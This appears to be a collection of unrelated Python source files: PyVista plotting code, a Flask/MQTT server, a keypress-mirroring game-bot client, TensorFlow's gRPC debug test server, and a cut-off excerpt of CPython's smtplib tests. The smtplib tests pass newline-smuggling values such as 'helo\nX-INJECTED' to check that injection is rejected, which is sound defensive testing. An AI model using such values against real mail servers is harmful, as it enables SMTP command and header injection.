bounds=(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0),
focal_point=(0.0, 0.0, 0.0),
color=None,
):
"""Add a cursor of a PyVista or VTK dataset to the scene.
Parameters
----------
bounds : length 6 sequence
Specify the bounds in the format of:
- ``(xmin, xmax, ymin, ymax, zmin, zmax)``
Defaults to ``(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0)``.
focal_point : list or tuple, optional
The focal point of the cursor.
Defaults to ``(0.0, 0.0, 0.0)``.
color : str or sequence, optional
Either a string, RGB sequence, or hex color string. For one
of the following.
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
Returns
-------
vtk.vtkActor
VTK actor of the 2D cursor.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> _ = plotter.add_cursor()
>>> plotter.show()
"""
alg = _vtk.vtkCursor3D()
alg.SetModelBounds(bounds)
alg.SetFocalPoint(focal_point)
alg.AllOn()
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(parse_color(color))
return actor
# Tracks created plotters. At the end of the file as we need to
# define ``BasePlotter`` before including it in the type definition.
_ALL_PLOTTERS: Dict[str, BasePlotter] = {}
def _kill_display(disp_id): # pragma: no cover
"""Forcibly close the display on Linux.
See: https://gitlab.kitware.com/vtk/vtk/-/issues/17917#note_783584
And more details into why...
https://stackoverflow.com/questions/64811503
Notes
-----
This is to be used experimentally and is known to cause issues
on `pyvistaqt`
"""
if platform.system() != 'Linux':
raise OSError('This method only works on Linux')
if disp_id:
cdisp_id = int(disp_id[1:].split('_')[0], 16)
# this is unsafe as events might be queued, but sometimes the
# window fails to close if we don't just close it
Thread(target=X11.XCloseDisplay, args=(cdisp_id, )).start()
|
server.py
|
import root.settings as settings
import root.api.rest.rest_routes as rest
from root.api.rest.rest_routes import app
import root.api.mqtt.mqtt_routes as mqtt
from werkzeug.serving import run_simple
import threading
def start_server():
thread = threading.Thread(target = start_thread)
thread.start()
mqtt.connect()
def start_server_https():
thread = threading.Thread(target = start_thread_https)
thread.start()
mqtt.connect()
def start_thread():
app.run(host = settings.FLASK_ADDRESS, port = settings.FLASK_PORT)
def start_thread_https():
app.run(host = settings.FLASK_ADDRESS, port = settings.FLASK_PORT, ssl_context=('/home/on-premise/root/certs/cert.pem', '/home/on-premise/root/certs/key.pem'))
def new_event(topic_event, topic_response, function):
mqtt.new_event(topic_event, topic_response, function)
def new_api(foo, path, method):
rest.new_api(foo, path, method)
|
client.py
|
import socket
import select
import errno
import sys
from pynput.keyboard import Key, Listener, KeyCode
from pynput import mouse, keyboard
from random import randint
import subprocess
import threading
import time
import os
class RHBotClientConnection():
def __init__(self, ip, delay=0) -> None:
self.delay = delay
self.HEADER_LENGTH = 10
self.IP = ip
self.PORT = 1351
self.my_username = "Testy Test "+str(randint(100, 1000))
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.connect((self.IP, self.PORT))
self.client_socket.setblocking(False)
username = self.my_username.encode('utf-8')
username_header = f"{len(username):<{self.HEADER_LENGTH}}".encode(
'utf-8')
self.client_socket.send(username_header + username)
def send_message(self, message):
if self.delay > 0:
self.send_message_delayed(message, self.delay)
else:
message = message.encode('utf-8')
message_header = f"{len(message):<{self.HEADER_LENGTH}}".encode(
'utf-8')
self.client_socket.send(message_header + message)
def send_message_delayed(self, message, delay):
start_time = time.time()
t = threading.Thread(target=self.delay_thread,
args=(message, delay, start_time))
t.start()
def delay_thread(self, message, delay, start_time):
message = message.encode('utf-8')
message_header = f"{len(message):<{self.HEADER_LENGTH}}".encode(
'utf-8')
time.sleep(delay - (time.time()-start_time))
self.client_socket.send(message_header + message)
def main_loop(self):
while True:
time.sleep(0.5)
class ClientKeypressListener():
def __init__(self, list_servers) -> None:
self.list_servers = list_servers
self.listener = None
self.unreleased_keys = []
def start_keypress_listener(self):
if self.listener == None:
self.listener = Listener(on_press=self.on_press,
on_release=self.on_release)
self.listener.start()
def on_press(self, key):
if key == keyboard.Key.f4:
print("Exiting bot")
os._exit(1)
if str(key) not in self.unreleased_keys:
for server in self.list_servers:
server.send_message(str(key)+",down")
self.unreleased_keys.append(str(key))
def on_release(self, key):
for server in self.list_servers:
server.send_message(str(key)+",up")
self.unreleased_keys.remove(str(key))
class ClientUtils():
def grab_online_servers():
output = subprocess.run("arp -a", capture_output=True).stdout.decode()
list_ips = []
with open("servers.txt", "r") as f:
lines = f.readlines()
for ip in lines:
if ip.strip() in output:
list_ips.append(ip.strip())
return list_ips
def start_server_thread(server):
t = threading.Thread(target=server.main_loop(), daemon=True)
t.start()
class RHBotClient():
def start(delay_min=0, delay_spacing=5):
list_ips = ClientUtils.grab_online_servers()
list_servers = []
for i, ip in enumerate(list_ips):
if delay_min == 0:
list_servers.append(RHBotClientConnection(ip))
else:
list_servers.append(RHBotClientConnection(
ip, delay_min+i*delay_spacing))
ckl = ClientKeypressListener(list_servers)
ckl.start_keypress_listener()
for server in list_servers:
ClientUtils.start_server_thread(server)
while True:
time.sleep(1)
if __name__ == "__main__":
RHBotClient.start()
|
grpc_debug_test_server.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""GRPC debug server for testing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import errno
import functools
import hashlib
import json
import os
import re
import shutil
import tempfile
import threading
import time
import portpicker
from tensorflow.core.debug import debug_service_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import grpc_debug_server
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.ops import variables
from tensorflow.python.util import compat
def _get_dump_file_path(dump_root, device_name, debug_node_name):
"""Get the file path of the dump file for a debug node.
Args:
dump_root: (str) Root dump directory.
device_name: (str) Name of the device that the debug node resides on.
debug_node_name: (str) Name of the debug node, e.g.,
cross_entropy/Log:0:DebugIdentity.
Returns:
(str) Full path of the dump file.
"""
dump_root = os.path.join(
dump_root, debug_data.device_name_to_device_path(device_name))
if "/" in debug_node_name:
dump_dir = os.path.join(dump_root, os.path.dirname(debug_node_name))
dump_file_name = re.sub(":", "_", os.path.basename(debug_node_name))
else:
dump_dir = dump_root
dump_file_name = re.sub(":", "_", debug_node_name)
now_microsec = int(round(time.time() * 1000 * 1000))
dump_file_name += "_%d" % now_microsec
return os.path.join(dump_dir, dump_file_name)
class EventListenerTestStreamHandler(
grpc_debug_server.EventListenerBaseStreamHandler):
"""Implementation of EventListenerBaseStreamHandler that dumps to file."""
def __init__(self, dump_dir, event_listener_servicer):
super(EventListenerTestStreamHandler, self).__init__()
self._dump_dir = dump_dir
self._event_listener_servicer = event_listener_servicer
if self._dump_dir:
self._try_makedirs(self._dump_dir)
self._grpc_path = None
self._cached_graph_defs = []
self._cached_graph_def_device_names = []
self._cached_graph_def_wall_times = []
def on_core_metadata_event(self, event):
self._event_listener_servicer.toggle_watch()
core_metadata = json.loads(event.log_message.message)
if not self._grpc_path:
grpc_path = core_metadata["grpc_path"]
if grpc_path:
if grpc_path.startswith("/"):
grpc_path = grpc_path[1:]
if self._dump_dir:
self._dump_dir = os.path.join(self._dump_dir, grpc_path)
# Write cached graph defs to filesystem.
for graph_def, device_name, wall_time in zip(
self._cached_graph_defs,
self._cached_graph_def_device_names,
self._cached_graph_def_wall_times):
self._write_graph_def(graph_def, device_name, wall_time)
if self._dump_dir:
self._write_core_metadata_event(event)
else:
self._event_listener_servicer.core_metadata_json_strings.append(
event.log_message.message)
def on_graph_def(self, graph_def, device_name, wall_time):
"""Implementation of the tensor value-carrying Event proto callback.
Args:
graph_def: A GraphDef object.
device_name: Name of the device on which the graph was created.
wall_time: An epoch timestamp (in microseconds) for the graph.
"""
if self._dump_dir:
if self._grpc_path:
self._write_graph_def(graph_def, device_name, wall_time)
else:
self._cached_graph_defs.append(graph_def)
self._cached_graph_def_device_names.append(device_name)
self._cached_graph_def_wall_times.append(wall_time)
else:
self._event_listener_servicer.partition_graph_defs.append(graph_def)
def on_value_event(self, event):
"""Implementation of the tensor value-carrying Event proto callback.
Writes the Event proto to the file system for testing. The path written to
follows the same pattern as the file:// debug URLs of tfdbg, i.e., the
name scope of the op becomes the directory structure under the dump root
directory.
Args:
event: The Event proto carrying a tensor value.
Returns:
If the debug node belongs to the set of currently activated breakpoints,
a `EventReply` proto will be returned.
"""
if self._dump_dir:
self._write_value_event(event)
else:
value = event.summary.value[0]
tensor_value = debug_data.load_tensor_from_event(event)
self._event_listener_servicer.debug_tensor_values[value.node_name].append(
tensor_value)
items = event.summary.value[0].node_name.split(":")
node_name = items[0]
output_slot = int(items[1])
debug_op = items[2]
if ((node_name, output_slot, debug_op) in
self._event_listener_servicer.breakpoints):
return debug_service_pb2.EventReply()
def _try_makedirs(self, dir_path):
if not os.path.isdir(dir_path):
try:
os.makedirs(dir_path)
except OSError as error:
if error.errno != errno.EEXIST:
raise
def _write_core_metadata_event(self, event):
core_metadata_path = os.path.join(
self._dump_dir,
debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG +
"_%d" % event.wall_time)
self._try_makedirs(self._dump_dir)
with open(core_metadata_path, "wb") as f:
f.write(event.SerializeToString())
def _write_graph_def(self, graph_def, device_name, wall_time):
encoded_graph_def = graph_def.SerializeToString()
graph_hash = int(hashlib.md5(encoded_graph_def).hexdigest(), 16)
event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time)
graph_file_path = os.path.join(
self._dump_dir,
debug_data.device_name_to_device_path(device_name),
debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG +
debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time))
self._try_makedirs(os.path.dirname(graph_file_path))
with open(graph_file_path, "wb") as f:
f.write(event.SerializeToString())
def _write_value_event(self, event):
value = event.summary.value[0]
# Obtain the device name from the metadata.
summary_metadata = event.summary.value[0].metadata
if not summary_metadata.plugin_data:
raise ValueError("The value lacks plugin data.")
try:
content = json.loads(compat.as_text(summary_metadata.plugin_data.content))
except ValueError as err:
raise ValueError("Could not parse content into JSON: %r, %r" % (content,
err))
device_name = content["device"]
dump_full_path = _get_dump_file_path(
self._dump_dir, device_name, value.node_name)
self._try_makedirs(os.path.dirname(dump_full_path))
with open(dump_full_path, "wb") as f:
f.write(event.SerializeToString())
class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer):
"""An implementation of EventListenerBaseServicer for testing."""
def __init__(self, server_port, dump_dir, toggle_watch_on_core_metadata=None):
"""Constructor of EventListenerTestServicer.
Args:
server_port: (int) The server port number.
dump_dir: (str) The root directory to which the data files will be
dumped. If empty or None, the received debug data will not be dumped
to the file system: they will be stored in memory instead.
toggle_watch_on_core_metadata: A list of
(node_name, output_slot, debug_op) tuples to toggle the
watchpoint status during the on_core_metadata calls (optional).
"""
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
self._initialize_toggle_watch_state(toggle_watch_on_core_metadata)
grpc_debug_server.EventListenerBaseServicer.__init__(
self, server_port,
functools.partial(EventListenerTestStreamHandler, dump_dir, self))
# Members for storing the graph ops traceback and source files.
self._call_types = []
self._call_keys = []
self._origin_stacks = []
self._origin_id_to_strings = []
self._graph_tracebacks = []
self._graph_versions = []
self._source_files = None
def _initialize_toggle_watch_state(self, toggle_watches):
self._toggle_watches = toggle_watches
self._toggle_watch_state = dict()
if self._toggle_watches:
for watch_key in self._toggle_watches:
self._toggle_watch_state[watch_key] = False
def toggle_watch(self):
for watch_key in self._toggle_watch_state:
node_name, output_slot, debug_op = watch_key
if self._toggle_watch_state[watch_key]:
self.request_unwatch(node_name, output_slot, debug_op)
else:
self.request_watch(node_name, output_slot, debug_op)
self._toggle_watch_state[watch_key] = (
not self._toggle_watch_state[watch_key])
def clear_data(self):
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
self._call_types = []
self._call_keys = []
self._origin_stacks = []
self._origin_id_to_strings = []
self._graph_tracebacks = []
self._graph_versions = []
self._source_files = None
def SendTracebacks(self, request, context):
self._call_types.append(request.call_type)
self._call_keys.append(request.call_key)
self._origin_stacks.append(request.origin_stack)
self._origin_id_to_strings.append(request.origin_id_to_string)
self._graph_tracebacks.append(request.graph_traceback)
self._graph_versions.append(request.graph_version)
return debug_service_pb2.EventReply()
def SendSourceFiles(self, request, context):
self._source_files = request
return debug_service_pb2.EventReply()
def query_op_traceback(self, op_name):
"""Query the traceback of an op.
Args:
op_name: Name of the op to query.
Returns:
The traceback of the op, as a list of 3-tuples:
(filename, lineno, function_name)
Raises:
ValueError: If the op cannot be found in the tracebacks received by the
server so far.
"""
for op_log_proto in self._graph_tracebacks:
for log_entry in op_log_proto.log_entries:
if log_entry.name == op_name:
return self._code_def_to_traceback(log_entry.code_def,
op_log_proto.id_to_string)
raise ValueError(
"Op '%s' does not exist in the tracebacks received by the debug "
"server.")
def query_origin_stack(self):
"""Query the stack of the origin of the execution call.
Returns:
A `list` of all tracebacks. Each item corresponds to an execution call,
i.e., a `SendTracebacks` request. Each item is a `list` of 3-tuples:
(filename, lineno, function_name).
"""
ret = []
for stack, id_to_string in zip(
self._origin_stacks, self._origin_id_to_strings):
ret.append(self._code_def_to_traceback(stack, id_to_string))
return ret
def query_call_types(self):
return self._call_types
def query_call_keys(self):
return self._call_keys
def query_graph_versions(self):
return self._graph_versions
def query_source_file_line(self, file_path, lineno):
"""Query the content of a given line in a source file.
Args:
file_path: Path to the source file.
lineno: Line number as an `int`.
Returns:
Content of the line as a string.
Raises:
ValueError: If no source file is found at the given file_path.
"""
for source_file_proto in self._source_files.source_files:
if source_file_proto.file_path == file_path:
return source_file_proto.lines[lineno - 1]
raise ValueError(
"Source file at path %s has not been received by the debug server",
file_path)
def _code_def_to_traceback(self, code_def, id_to_string):
return [(id_to_string[trace.file_id],
trace.lineno,
id_to_string[trace.function_id]) for trace in code_def.traces]
def start_server_on_separate_thread(dump_to_filesystem=True,
server_start_delay_sec=0.0,
poll_server=False,
blocking=True,
toggle_watch_on_core_metadata=None):
"""Create a test gRPC debug server and run on a separate thread.
Args:
dump_to_filesystem: (bool) whether the debug server will dump debug data
to the filesystem.
server_start_delay_sec: (float) amount of time (in sec) to delay the server
start up for.
poll_server: (bool) whether the server will be polled till success on
startup.
blocking: (bool) whether the server should be started in a blocking mode.
toggle_watch_on_core_metadata: A list of
(node_name, output_slot, debug_op) tuples to toggle the
watchpoint status during the on_core_metadata calls (optional).
Returns:
server_port: (int) Port on which the server runs.
debug_server_url: (str) grpc:// URL to the server.
server_dump_dir: (str) The debug server's dump directory.
server_thread: The server Thread object.
server: The `EventListenerTestServicer` object.
Raises:
ValueError: If polling the server process for ready state is not successful
within maximum polling count.
"""
server_port = portpicker.pick_unused_port()
debug_server_url = "grpc://localhost:%d" % server_port
server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None
server = EventListenerTestServicer(
server_port=server_port,
dump_dir=server_dump_dir,
toggle_watch_on_core_metadata=toggle_watch_on_core_metadata)
def delay_then_run_server():
time.sleep(server_start_delay_sec)
server.run_server(blocking=blocking)
server_thread = threading.Thread(target=delay_then_run_server)
server_thread.start()
if poll_server:
if not _poll_server_till_success(
50,
0.2,
debug_server_url,
server_dump_dir,
server,
gpu_memory_fraction=0.1):
raise ValueError(
"Failed to start test gRPC debug server at port %d" % server_port)
server.clear_data()
return server_port, debug_server_url, server_dump_dir, server_thread, server
def _poll_server_till_success(max_attempts,
sleep_per_poll_sec,
debug_server_url,
dump_dir,
server,
gpu_memory_fraction=1.0):
"""Poll server until success or exceeding max polling count.
Args:
max_attempts: (int) How many times to poll at maximum
sleep_per_poll_sec: (float) How many seconds to sleep for after each
unsuccessful poll.
debug_server_url: (str) gRPC URL to the debug server.
dump_dir: (str) Dump directory to look for files in. If None, will directly
check data from the server object.
server: The server object.
gpu_memory_fraction: (float) Fraction of GPU memory to be
allocated for the Session used in server polling.
Returns:
(bool) Whether the polling succeeded within max_polls attempts.
"""
poll_count = 0
config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions(
per_process_gpu_memory_fraction=gpu_memory_fraction))
with session.Session(config=config) as sess:
for poll_count in range(max_attempts):
server.clear_data()
print("Polling: poll_count = %d" % poll_count)
x_init_name = "x_init_%d" % poll_count
x_init = constant_op.constant([42.0], shape=[1], name=x_init_name)
x = variables.Variable(x_init, name=x_init_name)
run_options = config_pb2.RunOptions()
debug_utils.add_debug_tensor_watch(
run_options, x_init_name, 0, debug_urls=[debug_server_url])
try:
sess.run(x.initializer, options=run_options)
except errors.FailedPreconditionError:
pass
if dump_dir:
if os.path.isdir(
dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0:
shutil.rmtree(dump_dir)
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
else:
if server.debug_tensor_values:
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
return False
|
test_smtplib.py
|
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import _asyncore as asyncore
from test.support import _smtpd as smtpd
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except TimeoutError:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
def testUnixDomainSocketTimeoutDefault(self):
local_host = '/some/local/lmtp/delivery/program'
mock_socket.reply_with(b"220 Hello world")
try:
client = self.client(local_host, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except TimeoutError:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def test_issue43124_putcmd_escapes_newline(self):
# see: https://bugs.python.org/issue43124
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.putcmd('helo\nX-INJECTED')
self.assertIn("prohibited newline characters", str(exc.exception))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('[email protected]'), expected)
self.assertEqual(smtp.verify('[email protected]'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def test_issue43124_escape_localhostname(self):
# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='hi\nX-INJECTED',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.sendmail("[email protected]", "[email protected]", m)
self.assertIn(
"prohibited newline characters: ehlo hi\\nX-INJECTED",
str(exc.exception),
)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-INJECTED", debugout)
def test_issue43124_escape_options(self):
